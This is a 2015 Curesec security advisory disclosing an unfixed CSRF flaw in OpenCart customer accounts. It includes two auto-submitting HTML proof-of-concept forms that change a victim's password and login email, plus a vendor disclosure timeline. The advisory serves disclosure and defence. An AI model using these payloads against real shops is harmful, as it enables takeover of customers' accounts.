OpenCart CSRF

OpenCart CSRF

Date: 2015-10-07 15:55:51
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: OpenCart
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website:
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for customers. This means that customer accounts can be compromised by an attacker if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:

<form name="myform" method="post" action="http://localhost/opencart-" > <input type="hidden" name="password" value="12345"> <input type="hidden" name="confirm" value="12345"> </form> <script>document.myform.submit();</script>

Change profile information, including email address, which is used when logging in:

<form name="myform" method="post" action="http://localhost/opencart-" > <input type="hidden" name="currency" value="USD"> <input type="hidden" name="language" value="en"> <input type="hidden" name="firstname" value="Jane"> <input type="hidden" name="lastname" value="Smith"> <input type="hidden" name="email" value=""> <input type="hidden" name="telephone" value="1234567"> </form> <script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor points out that issue is already known, and that they do not plan on releasing a fix
10/07/2015 Disclosed to public